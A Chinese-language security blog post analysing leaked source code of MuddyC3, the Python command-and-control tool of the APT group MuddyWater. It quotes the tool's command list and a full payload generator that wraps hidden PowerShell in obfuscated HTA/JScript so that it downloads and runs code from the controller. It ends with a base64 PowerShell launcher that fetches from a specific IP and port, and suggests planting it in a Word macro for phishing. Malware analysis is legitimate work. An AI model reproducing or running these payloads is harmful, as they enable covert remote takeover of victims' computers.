APT组织武器:MuddyC3泄露代码分析
- 2019 年 11 月 6 日
- 筆記
微信公众号:七夜安全博客 关注信息安全技术、关注
系统底层原理。问题或建议,请公众号留言。
MuddyC3简介
MuddyC3是MuddyWater组织自研的渗透工具,基于Python的B/S架构。安全研究人员在Github上发布了相关恶意样本和反编译的源码,从代码的完整度和功能上,看出应该是早期版本,版本为1.0.0。
GitHub 地址:https://github.com/0xffff0800/muddyc3
再说一些这个apt组织,MuddyWater被普遍认为是一个来自中东地区的,长期活跃的APT组织。从2019年2月到4月,该组织发起了一系列针对土耳其、伊朗、阿富汗、伊拉克、塔吉克斯坦和阿塞拜疆的政府、教育机构、金融、电信和国防公司的网络钓鱼电子邮件攻击。
APT组织总是给人一种神秘强大的感觉,但并不意味着高不可及,无法触摸。本文就简要分析一下MuddyC3的代码,其实咱们也可以做到。
基本结构
MuddyC3 v1.0.0的代码量不大,结构还是比较清晰的,是个传统的B/S架构。控制端是基于web.py的服务端,而被控端使用了多种payload对机器进行控制,并和控制端进行http通信。
代码结构中:
- muddyc3.py用来启动web端,并显示命令参数和功能
- core目录下是核心代码,主要包括交互命令,加密以及web服务。
- lib目录下的web是web.py的库代码,prettytable.py是用来打印表格。
muddyc3.py
分为两部分功能:
1.生成被控端的木马payload,用户填入C&C服务器的ip和port,是基于powershell的,用于无文件攻击用户电脑.
2.启动webserver,与被控端进行通信,并在命令行接受黑客下一步的指令。
core核心代码
讲解一下core目录下的cmd.py和webserver.py文件。cmd.py中介绍了6种命令,但其中show命令没有实现。list命令用于列举所有的受控端,use命令用来与受控端进行交互。
HELPCOMMANDS = [ ['exit','Exit the console'], ['list','List all agents'], ['help','Help menu'], ['show','Show Command and Controler variables'], ['use','Interact with AGENT'], ['back','Back to the main'] ]
list命令主要列举受控端的用户名,机器名,系统版本以及内外网ip。
webserver实现了多种http接口,用来和受控端交互。受控端可以从服务端获取多种payload(可以加密),上传,下载文件,命令执行,以及保持心跳。
其中mshta.exe的payload比较有意思,还做了一些简单加密和混淆,防止进行安全人员进行解析。
class mshta: def GET(self): ip = web.ctx.ip p_out = '[+] New Agent Request PAYLOAD (%s)'%(ip) print bcolors.OKGREEN + p_out + bcolors.ENDC code = ''' <html> <head> <script language="JScript"> window.resizeTo(1, 1); window.moveTo(-2000, -2000); window.blur(); try { window.onfocus = function() { window.blur(); } window.onerror = function(sMsg, sUrl, sLine) { return false; } } catch (e){} function replaceAll(find, replace, str) { while( str.indexOf(find) > -1) { str = str.replace(find, replace); } return str; } function bas( string ) { string = replaceAll(']','=',string); string = replaceAll('[','a',string); string = replaceAll(',','b',string); string = replaceAll('@','D',string); string = replaceAll('-','x',string); string = replaceAll('~','N',string); string = replaceAll('*','E',string); string = replaceAll('%','C',string); string = replaceAll('$','H',string); string = replaceAll('!','G',string); string = replaceAll('{','K',string); string = replaceAll('}','O',string); var characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var result = ''; var i = 0; do { var b1 = characters.indexOf( string.charAt(i++) ); var b2 = characters.indexOf( string.charAt(i++) ); var b3 = characters.indexOf( string.charAt(i++) ); var b4 = characters.indexOf( string.charAt(i++) ); var a = ( ( b1 & 0x3F ) << 2 ) | ( ( b2 >> 4 ) & 0x3 ); var b = ( ( b2 & 0xF ) << 4 ) | ( ( b3 >> 2 ) & 0xF ); var c = ( ( b3 & 0x3 ) << 6 ) | ( b4 & 0x3F ); result += String.fromCharCode(a) + (b?String.fromCharCode(b):'') + (c?String.fromCharCode(c):''); } while( i < string.length ); return result; } var es = '{code}'; eval(bas(es)); </script> <hta:application caption="no" showInTaskBar="no" windowState="minimize" navigable="no" scroll="no" /> </head> <body> </body> </html> ''' js = ''' var cm="powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://{ip}:{port}/get'));"; var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup'); w32ps.SpawnInstance_(); w32ps.ShowWindow=0; var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null); ''' js = js.replace('{ip}',config.IP).replace('{port}',config.PORT) js = js.encode('base64').replace('n','') re = [[']','='],['[','a'],[',','b'],['@','D'],['-','x'],['~','N'],['*','E'],['%','C'],['$','H'],['!','G'],['{','K'],['}','O']] for i in re: js = js.replace(i[1],i[0]) return code.replace('{code}',js)
运行一下
将下面打印出来的powershell payload在目标机器上运行一下,就会被控制。可以将代码放到word宏中,钓鱼执行。
Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert] ::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVt OZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGl hbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG9 3bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMTMuOTcuMzUuMTU4OjgwMDEvZ2V0Jyk7SUVYKCRzKQ==')))" -WindowStyle Hidden
